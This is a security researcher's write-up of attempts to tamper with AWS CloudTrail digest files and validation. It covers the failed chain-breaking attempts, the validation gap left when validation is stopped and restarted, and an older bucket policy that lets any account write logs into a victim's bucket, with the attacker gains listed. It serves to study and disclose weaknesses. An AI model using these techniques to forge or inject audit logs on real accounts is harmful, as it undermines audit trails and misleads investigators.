CloudTrail

A successful research comprises of countless failures. These are some documented failures :)

Fail I - Breaking Digest Integrity Chain

Attempt Goal : The first file of Digest Chain has multiple fields as null including fields like previousDigestHashValue. Idea was to try making such fields null for new Digest Files too in an attempt to break the integrity chain since making them null would cause the linked list to break.

{
  "awsAccountId": "800303608826",
  "digestStartTime": "2022-07-09T14:04:50Z",
  "digestEndTime": "2022-07-09T15:04:50Z",
  "digestS3Bucket": "aws-cloudtrail-logs-800303608826-76f246ce",
  "digestS3Object": "AWSLogs/800303608826/CloudTrail-Digest/us-east-1/2022/07/09/800303608826_CloudTrail-Digest_us-east-1_try_us-east-1_20220709T150450Z.json.gz",
  "digestPublicKeyFingerprint": "6901013c91c7a52c57e083fa423e1f08",
  "digestSignatureAlgorithm": "SHA256withRSA",
  "newestEventTime": null,
  "oldestEventTime": null,
  "previousDigestS3Bucket": null,
  "previousDigestS3Object": null,
  "previousDigestHashValue": null,
  "previousDigestHashAlgorithm": null,
  "previousDigestSignature": null,
  "logFiles": []
}

Process : Started a new CloudTrail with Log validation enabled. Since each Digest File is added once in an hour, it was a long waiting game. I didnt touch the first Digest File since it had everything null and had no linking. The next Digest Files contains field and their legit values. Example :-

{
  "awsAccountId": "111122223333",
  "digestStartTime": "2015-08-17T14:01:31Z",
  "digestEndTime": "2015-08-17T15:01:31Z",
  "digestS3Bucket": "S3-bucket-name",
  "digestS3Object": "AWSLogs/111122223333/CloudTrail-Digest/us-east-2/2015/08/17/111122223333_CloudTrail-Digest_us-east-2_your-trail-name_us-east-2_20150817T150131Z.json.gz",
  "digestPublicKeyFingerprint": "31e8b5433410dfb61a9dc45cc65b22ff",
  "digestSignatureAlgorithm": "SHA256withRSA",
  "newestEventTime": "2015-08-17T14:52:27Z",
  "oldestEventTime": "2015-08-17T14:42:27Z",
  "previousDigestS3Bucket": "S3-bucket-name",
  "previousDigestS3Object": "AWSLogs/111122223333/CloudTrail-Digest/us-east-2/2015/08/17/111122223333_CloudTrail-Digest_us-east-2_your-trail-name_us-east-2_20150817T140131Z.json.gz",
  "previousDigestHashValue": "97fb791cf91ffc440d274f8190dbdd9aa09c34432aba82739df18b6d3c13df2d",
  "previousDigestHashAlgorithm": "SHA-256",
  "previousDigestSignature": "50887ccffad4c002b97caa37cc9dc626e3c680207d41d27fa5835458e066e0d3652fc4dfc30937e4d5f4cc7f796e7a258fb50a43ac427f2237f6e505d4efaf373d156e15e3b68dea9f58111d395b62628d6bd367a9024d2183b5c5f6e19466d3a996b92df705bc997b8a0e13430f241d733cf95df4e41bb6c304c3f58363043572ea57a27085639ce187e679c0d81c7519b1184fa77fb7ab0b0e40a32dace6e1eefc3995c5ae182da49b62b26398cebb52a2201a6387b75b89c83e5570bcb9bba6c34a80f2f00a1c6ebe07d1ff149eccd812dc805bb3eeff6657db32a6cb48d2d096404eb76181877bc6ebb8cd0b23f823200155b2fd8848d428e46e8456328a",
  "logFiles": [
    {
      "s3Bucket": "S3-bucket-name",
      "s3Object": "AWSLogs/111122223333/CloudTrail/us-east-2/2015/08/17/111122223333_CloudTrail_us-east-2_20150817T1445Z_9nYN7gp2eWAJHIfT.json.gz",
      "hashValue": "9bb6196fc6b84d6f075a56548feca262bd99ba3c2de41b618e5b6e22c1fc71f6",
      "hashAlgorithm": "SHA-256",
      "newestEventTime": "2015-08-17T14:52:27Z",
      "oldestEventTime": "2015-08-17T14:42:27Z"
    }
  ]
}

The idea over here was to modify this json and make logFiles as empty list [] and make other fields of pattern previous* null. Thought process was that moment I make them null, it would cause the linked List to break and each node would be independent.

Running the CloudTrail Validation API Call showed that there was an error of Signature Invalidation which broke the file integrity for the Digest File.

This meant that there is some Signature Check. Reading the documentation in detail on performing the validation check shows that there is a Signature with field value x-amz-meta-signature in metadata of the cloudtrail log object.

String to be signed =

Digest_End_Timestamp_in_UTC_Extended_format + '\n' +
Current_Digest_File_S3_Path + '\n' +
Hex(Sha256(current-digest-file-content)) + '\n' +
Previous_digest_signature_in_hex 

Next attempt was to fake everything from Digest_TimeStamp,File_s3_path,current-digest-file-content and previous_digest_singature and attempt to get a valid string which would be signed with private key of CloudTrail.

In order to do so, I modified the Digest File and copy pasted the values from first digest file which had everything null and even copied the x-amz-meta-signature field of previous digest file in attempt to get same Input String as the previous Digest File.

Running Validate-Logs on new Digest File gave a new error called INVALID: has been moved from its original location. This meant that it was also checking if object_name in the digest file is same as current object name before checking the validation of signing string.

This meant there was no way for me to modify the Digest File. This ended hope of finding something interesting.

Fail II - Stop and Start Validation

Attempt Goal : Goal here was to stop validation for short time and then start it back to check how would digest file react to this change.

Process : Enabled Digest File for some time and later stopped the validation and restarted it back on after some time. Observation was that during the first time duration when validation was active, it would continue the Linked List and add new nodes along with the relationship as time goes on.

Once you stop the validation the Digest is stopped abrupty. Since the last Digest File inserted has no future relationships, stopping validation didn't have any effect.

Starting the validation back on showed something interesting. The Digest file would now be started back on but the first Digest File inserted post switching the validation back on has no relationship with previous digest File. It's as if the new digest file have forgotten about everything and starts fresh new.

This meant that the linked List had broken down and now, we had 2 Linked List in our bucket. One which was created during start and was ended abruptly once we stopped the validation and another one was the recent one which started once we enabled the validation.

Running Validate-Log api call now, shows that all Digest File were validated including logs in those. Only during the time when the log-validation was off, there would be no validation being done against tampering of the logs inserted during that time.

Partial Win - III Insecure CloudTrail Bucket Policy

Attempt Goal : Check Bucket policy of s3 bucket where logs are stored in an attempt to insert CT logs into another Unauthorised bucket.

Process : It seems that AWS has recently updated default bucket policy for cloudtrail and folks using older bucket policy have unsafe bucket permissions which allows anyone to put their cloudtrail logs into your bucket.

Unsafe policy :

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AWSCloudTrailAclCheck20150319",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "s3:GetBucketAcl",
            "Resource": "arn:aws:s3:::bucket_name"
        },
        {
            "Sid": "AWSCloudTrailWrite20150319",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::bucket_name/*",
            "Condition": {
                "StringEquals": {
                    "s3:x-amz-acl": "bucket-owner-full-control"
                }
            }
        }
    ]
}

This policy has no restriciton on who can insert logs into this bucket allowing anyone on internet to point their CT logs into this bucket.

AWS's new Default Policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AWSCloudTrailAclCheck20150319",
            "Effect": "Allow",
            "Principal": {"Service": "cloudtrail.amazonaws.com"},
            "Action": "s3:GetBucketAcl",
            "Resource": "arn:aws:s3:::myBucketName",
            "Condition": {
                "StringEquals": {
                    "aws:SourceArn": "arn:aws:cloudtrail:region:myAccountID:trail/trailName"
                }
            }
        },
        {
            "Sid": "AWSCloudTrailWrite20150319",
            "Effect": "Allow",
            "Principal": {"Service": "cloudtrail.amazonaws.com"},
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::myBucketName/[optionalPrefix]/AWSLogs/myAccountID/*",
            "Condition": {
                "StringEquals": {
                    "s3:x-amz-acl": "bucket-owner-full-control",
                    "aws:SourceArn": "arn:aws:cloudtrail:region:myAccountID:trail/trailName"
                }
            }
        }
    ]
}

This new bucket policy contains myAccountID which restricts only an accountID to insert logs here by reducing the risk.

What could have been possible gains from this?

  • Insert fake logs of another account into your CT bucket which might be source of truth for your account/org.

  • Insert KMS encrypted logs into your bucket which would have raised alarams since the logs wont be decrypted by the bucket owner in such case.

Last updated